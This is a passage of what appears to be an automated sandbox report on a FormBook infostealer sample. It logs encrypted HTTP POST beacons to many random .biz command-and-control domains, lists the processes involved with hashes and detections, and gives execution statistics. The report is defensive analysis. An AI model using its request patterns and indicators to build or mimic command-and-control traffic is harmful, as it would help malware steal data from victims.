Jan 10, 2025 21:24:19.067941904 CET	810	OUT	Data Raw: 7b 06 ac 93 44 33 d2 5d 1e 03 00 00 4d 26 cd f4 b2 f9 86 3c 80 27 ec d9 ac 42 59 00 d3 1c 16 ca 62 12 ac 83 49 e9 cd d7 de 43 89 89 8f 88 00 a6 fd 21 36 cb 7f 14 b8 eb 84 2a a9 32 b0 4f 81 30 2f 52 71 b9 47 71 85 c3 bc 79 4a b2 81 0b 71 fe f8 23 Data Ascii: {D3]M&<'BYbIC!6*2O0/RqGqyJq#w[Xfjsf\|~(Za\|1;,[K@Qmqyv.#7`ZTSs~(k>%-nfju/#o-KR`E9;nf<WK;D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49751	54.244.188.177	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:24:19.103081942 CET	349	OUT	POST /osbo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:24:19.103081942 CET	874	OUT	Data Raw: 19 fe 75 cb 0d 2a 17 b4 5e 03 00 00 e4 45 04 0a ad 2a 20 b8 9d c2 52 1d 46 6e 3e 57 dd d2 b1 2b de 34 45 56 ad e3 c9 80 1c f8 c1 b1 03 f6 ce c7 67 f2 5a 6f 83 3b f3 9c ac c5 7e 89 59 c3 a3 dd 05 19 71 c6 fd 88 13 6b e6 fa b2 84 0a 64 16 e3 25 38 Data Ascii: u^E RFn>W+4EVgZo;~Yqkd%8l%c%FBWz13vPrb7hs4/22\|^j5dR=7CdP)0n1\;0zfP@qQ532&9sTtCr@z7Y
Jan 10, 2025 21:24:19.805375099 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:24:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b90ef1185b17f06b8a3821cedeb94012\|8.46.123.189\|1736540659\|1736540659\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49758	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:24:19.887893915 CET	346	OUT	POST /mxe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:24:19.887907028 CET	874	OUT	Data Raw: 43 ce a5 a8 39 2d 07 46 5e 03 00 00 12 f0 04 20 b2 4f 13 b3 cc 02 56 0b 22 35 3c 58 b3 a1 00 3c 20 a5 51 92 82 6d b9 95 8d ad 45 6a c0 74 6d 73 c2 0a ca 72 5b d0 6d 02 af b5 53 8c ac 60 1e ae 4a a4 32 c4 d0 6b 04 26 a0 43 bc 06 ce 70 0e 2e f1 40 Data Ascii: C9-F^ OV"5<X< QmEjtmsr[mS`J2k&Cp.@`Ud:9;; $O%\nB1[9U]CxW#BVN}u>eIBP=5tr~z=7:ST~\%5,wn,AQNsirL:%"
Jan 10, 2025 21:24:21.256805897 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:24:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=7b6f15508d450007b0be47baa6ac02ac\|8.46.123.189\|1736540660\|1736540660\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49770	54.244.188.177	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:24:21.993343115 CET	355	OUT	POST /pajihutcfilntm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:24:21.993369102 CET	874	OUT	Data Raw: c1 02 71 be 76 24 88 44 5e 03 00 00 e9 6a e1 92 ee 06 58 13 36 29 8d 13 9d 90 83 a9 f3 39 e5 cd a4 06 7b 76 94 4e e3 82 81 4b 10 7b 27 eb ad 6f 18 58 30 e6 b2 59 ca 5a 0e f0 b8 8d 53 f2 d8 01 53 34 f2 ad ce 92 30 2e 3c 08 9a b0 92 cf ca ed 83 60 Data Ascii: qv$D^jX6)9{vNK{'oX0YZSS40.<`J/M7IC@tHEJ+vwQUX=m=#m_NvR"Y6hxO#t3^GuMJ7UNMq7x.bL'Nz
Jan 10, 2025 21:24:22.704122066 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:24:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=68a9aa2f12d02490f7b7020ce7ca54eb\|8.46.123.189\|1736540662\|1736540662\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49795	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:24:25.655034065 CET	355	OUT	POST /voucowxceex HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:24:25.655034065 CET	874	OUT	Data Raw: b0 17 82 d0 ea 7b 5a 79 5e 03 00 00 58 15 51 60 e0 d0 ff c4 21 0e bb 6a c2 fc 78 cf 36 2b d7 c8 6d 06 3c d3 43 19 1d 91 15 6b 6a 3e b9 0b 10 47 a0 6f 90 0d 38 39 9d 73 c7 01 08 01 eb 35 7f db 98 40 d5 88 73 98 39 81 cf f1 87 89 8e d9 ba 12 83 c6 Data Ascii: {Zy^XQ`!jx6+m<Ckj>Go89s5@s9X6,xb~nM9R;:3ck/I<P"cc>88%=,RUP!;Jjzc{SentS]K69^(}:y}z'3#`7)_}'WC4Q
Jan 10, 2025 21:24:27.035659075 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:24:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=2e6438ad6a2d1d0eb5af1879c8138308\|8.46.123.189\|1736540666\|1736540666\|0\|1\|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49993	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:25:03.565354109 CET	350	OUT	POST /ycqjghy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:25:03.565392971 CET	874	OUT	Data Raw: 07 72 9e 00 9a 3a 00 ed 5e 03 00 00 c3 8e ca 90 50 07 f2 ed 15 6e 0e 96 fe 41 f3 38 95 54 7b 17 be 33 a1 bd a7 09 c6 88 40 9f 1a be 38 ae 69 92 52 b5 fb 67 42 c1 7b 8c b8 90 13 9d e1 a1 e7 cb 0d ed 4b 08 1b 6d d1 f4 71 f6 10 80 bd 37 96 90 52 d4 Data Ascii: r:^PnA8T{3@8iRgB{Kmq7R5Njz=bZQ,l?d3,8k!?$@\<t55G<4PM8&48b4!56!Bbh}3VM%SA%/Z*}h(-`p4[
Jan 10, 2025 21:25:04.930838108 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:25:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=1d1f53bf446fc57e6df042a8deba4079\|8.46.123.189\|1736540704\|1736540704\|0\|1\|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	50002	54.244.188.177	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:25:12.396210909 CET	357	OUT	POST /wfnlorhejqfnr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:25:12.396225929 CET	874	OUT	Data Raw: 40 33 56 2e 50 99 9c 2a 5e 03 00 00 9e e0 fe f3 f4 e8 76 e2 f3 31 f2 b0 90 4f 4d 5c 7a 1a 85 2a f0 70 ca 16 1a 56 8b dd 41 14 f1 02 81 5d 4d e0 ea 75 5a 48 59 1a 48 15 f9 01 27 02 fe 50 86 4e 2b c6 0c d9 4d ec ca a8 ec 11 7e c2 26 c8 93 d0 7e 57 Data Ascii: @3V.P^v1OM\zpVA]MuZHYH'PN+M~&~W,w^F)%=2*AvDBOqd^x~fw%\|(K\|wziX&3$TXu-9}@_J!&_}Q3N!$3r?z=[?1
Jan 10, 2025 21:25:13.288357019 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:25:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=eb3790c521eb0990c764f1d3fc1b9ccc\|8.46.123.189\|1736540712\|1736540712\|0\|1\|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	50006	54.244.188.177	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:25:15.941524982 CET	352	OUT	POST /agqwjlv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:25:15.941550970 CET	874	OUT	Data Raw: a6 0c b2 28 be 85 47 ae 5e 03 00 00 2a d0 95 ab f6 66 84 61 15 10 1a 29 bc 97 5c 69 ad 3a 7d 6a a0 81 60 f5 eb bc 2a a2 d8 db e6 32 90 d8 f4 86 e8 10 cc e9 7d bb d0 93 dc f5 77 cb 11 0d 39 55 56 30 fa ab b3 82 6d aa ec 8f 59 a9 72 03 04 dc ec a6 Data Ascii: (G^fa)\i:}j`2}w9UV0mYr?cv6\R!q4CSm}rda^8/c31[.KAxI28Xhr-qY\|D?45+MB.U[NSD&R5/N6uBZ
Jan 10, 2025 21:25:16.925327063 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:25:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=59d486627410b6dff562dcc0e2309ead\|8.46.123.189\|1736540716\|1736540716\|0\|1\|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 10, 2025 21:25:16.925623894 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:25:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=59d486627410b6dff562dcc0e2309ead\|8.46.123.189\|1736540716\|1736540716\|0\|1\|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	50009	54.244.188.177	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:25:18.742618084 CET	360	OUT	POST /ibckscxhsodddaet HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:25:18.742618084 CET	874	OUT	Data Raw: 7f 6a 67 25 fc b1 98 c2 5e 03 00 00 72 e3 12 c6 9a 61 8e 49 34 f1 f7 4f cb 71 e3 0e 5f e3 d3 a3 49 40 2f 93 64 3e 8b 53 68 be 70 ba aa 9a 8c 90 93 4e 72 e2 48 ac 82 5b c6 45 cb 47 b1 70 cb dc 0a 5d 77 b2 71 eb dc 80 ce 6e da d2 af 27 46 d9 99 50 Data Ascii: jg%^raI4Oq_I@/d>ShpNrH[EGp]wqn'FPr+.*M`hSNcUA.\rL)w"Q&r!U-xH/QP~\q,cXyb0b tFKPUN:>m+)F;S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	50010	54.244.188.177	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:25:19.134802103 CET	353	OUT	POST /rwlfutjcp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:25:19.134896040 CET	874	OUT	Data Raw: f8 1e 39 ed b1 f8 e0 a3 5e 03 00 00 4c 1c 80 de b7 75 80 7b dd 3d 60 8b c1 a1 3d 22 e1 f7 78 a7 3d af 55 98 c9 14 61 14 3a 20 a9 6d b5 99 3b 62 0f 09 17 73 69 4a 5c 08 3c 6e 24 df ef 77 1b f7 9a 95 18 71 7a f8 7b 21 05 2c f2 ff a0 88 2a 50 26 30 Data Ascii: 9^Lu{=`="x=Ua: m;bsiJ\<n$wqz{!,P&0x'BdZr1/C-Cpo\&&3i(0(LU{V9LZnc{#6{\@.mDJ)TYiG@m4'ntkS/TO)EA\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	50011	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:25:23.274118900 CET	349	OUT	POST /shvehx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:25:23.274151087 CET	874	OUT	Data Raw: 2a 09 97 9d ea 97 c6 c6 5e 03 00 00 c9 9c cd 20 81 23 f4 48 3e 26 5c 34 7e 9b 20 cd 8a d1 3b 78 1d 24 95 70 99 f9 a7 31 0d ef 20 cf d2 fe ab 70 05 8a 1a 16 af 0c ec cd 63 55 29 7a 4d cd fe 9a cd 37 f4 5d 95 71 04 79 45 06 e9 0e fe c2 fc 30 38 ab Data Ascii: *^ #H>&\4~ ;x$p1 pcU)zM7]qyE08=vAezGiW(1-w3&p^,\|Bsgb+1VC$:u9>7' y0{IQ'nfX3JITM&y5r[z$/n&WZx;G"
Jan 10, 2025 21:25:24.640212059 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:25:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f8a119ecfbd483c6426decc3f6ef619a\|8.46.123.189\|1736540724\|1736540724\|0\|1\|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	50014	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:25:26.014388084 CET	347	OUT	POST /tfd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:25:26.014431000 CET	874	OUT	Data Raw: d2 41 d1 fc 97 61 68 94 5e 03 00 00 4a a9 9d ff 03 ca 48 73 8f 81 61 3c 21 47 44 c0 89 59 68 b0 fd 97 c8 da 56 5c 7b 58 18 ab b1 27 f9 66 22 ad 1c 97 6e dc e5 ba 68 a0 0b cb 95 e6 15 b8 2a c7 21 26 ee ac be 5f 05 12 93 16 d3 c4 0a 70 c7 1a 3f 45 Data Ascii: Aah^JHsa<!GDYhV\{X'f"nh*!&_p?EQT=`sp^)<ws4-6W77 vZhkg4E`3fB()<jz-x_IUp@4?U_?nD#~yj48FM)lH\|\|VmR5b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	50015	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:25:27.109468937 CET	347	OUT	POST /hch HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:25:27.109496117 CET	874	OUT	Data Raw: 12 4d 9a ec b7 be 66 68 5e 03 00 00 86 86 81 44 7b a6 e2 81 15 e4 7b 06 8b 8c f4 b2 97 20 73 5e 2c 12 bc 64 bd 38 58 05 93 8f 2d d7 1e 73 60 0e 25 07 c0 92 fc 92 73 b5 6a d3 e3 75 37 78 62 56 76 37 fc b2 18 9e c9 33 8b 21 ea d1 2c ee 27 9e f9 5f Data Ascii: Mfh^D{{ s^,d8X-s`%sju7xbVv73!,'_bc^jkkIQ[QG"/8v>+ZCXE(/w\~RzK,ArD!T80R$L^Id&f'cslNee/i-
Jan 10, 2025 21:25:28.474107981 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:25:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0bf6068be65e3263b227e15ed9882cfb\|8.46.123.189\|1736540728\|1736540728\|0\|1\|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	50038	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:26:15.852916002 CET	357	OUT	POST /gloumaahxxajxf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: warkcdu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Jan 10, 2025 21:26:15.852916002 CET	874	OUT	Data Raw: 4d f9 29 6b e4 ad e1 0a 5e 03 00 00 23 ca 6e 99 f8 a4 2e ba 32 98 45 1c f4 f0 4e d8 90 09 7e 4f db 66 56 c4 b8 05 8f 58 0a 8e e2 31 6d e9 73 5c db 36 9b 0c f8 b9 9d 7a 91 be 0f 0b 0d 2d 9a 1c c1 2f 66 39 35 26 2b 2b 8e e8 4e 25 8a 67 9e 4d e6 58 Data Ascii: M)k^#n.2EN~OfVX1ms\6z-/f95&++N%gMX.!y%CpN!M1bRZi]`Qc>QEDg*{qC~0p`V@#N$"=~>l(UMWiUk
Jan 10, 2025 21:26:17.311055899 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 20:26:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c62d82c6e857e5156a5ec5ce5881472e\|8.46.123.189\|1736540777\|1736540777\|0\|1\|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:24:13
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\I3LPkQh2an.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\I3LPkQh2an.exe"
Imagebase:	0x400000
File size:	1'793'024 bytes
MD5 hash:	B277E18DD8F1C8CC1908E58B16DB405C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:24:13
Start date:	10/01/2025
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'658'880 bytes
MD5 hash:	FD31927032749FC47370737BE446DF49
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	15:24:14
Start date:	10/01/2025
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x140000000
File size:	1'594'368 bytes
MD5 hash:	09DAC14A3F12ABA6BB239CCFA7799AD0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	15:24:15
Start date:	10/01/2025
Path:	C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	138'056 bytes
MD5 hash:	BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:24:15
Start date:	10/01/2025
Path:	C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	174'408 bytes
MD5 hash:	E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:24:15
Start date:	10/01/2025
Path:	C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	154'952 bytes
MD5 hash:	2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	15:24:15
Start date:	10/01/2025
Path:	C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AppVClient.exe
Imagebase:	0x140000000
File size:	1'348'608 bytes
MD5 hash:	0FBD336D4561FB58CC24C965F9B57A79
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:24:16
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\I3LPkQh2an.exe"
Imagebase:	0x6b0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1738864587.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1740236285.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:24:19
Start date:	10/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:	0x140000000
File size:	2'354'176 bytes
MD5 hash:	A19ADA9B1BCFFDFE7612B776B7EB43DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	15:24:21
Start date:	10/01/2025
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:	0x140000000
File size:	1'725'440 bytes
MD5 hash:	299377D30369966F4E6BFFFE968F16D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	6.8%
Signature Coverage:	7.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	82

Executed Functions

Function 00AFCBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

w, xrefs: 00AFC289
d, xrefs: 00AFC294

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID: d$w
API String ID: 0-2400632791
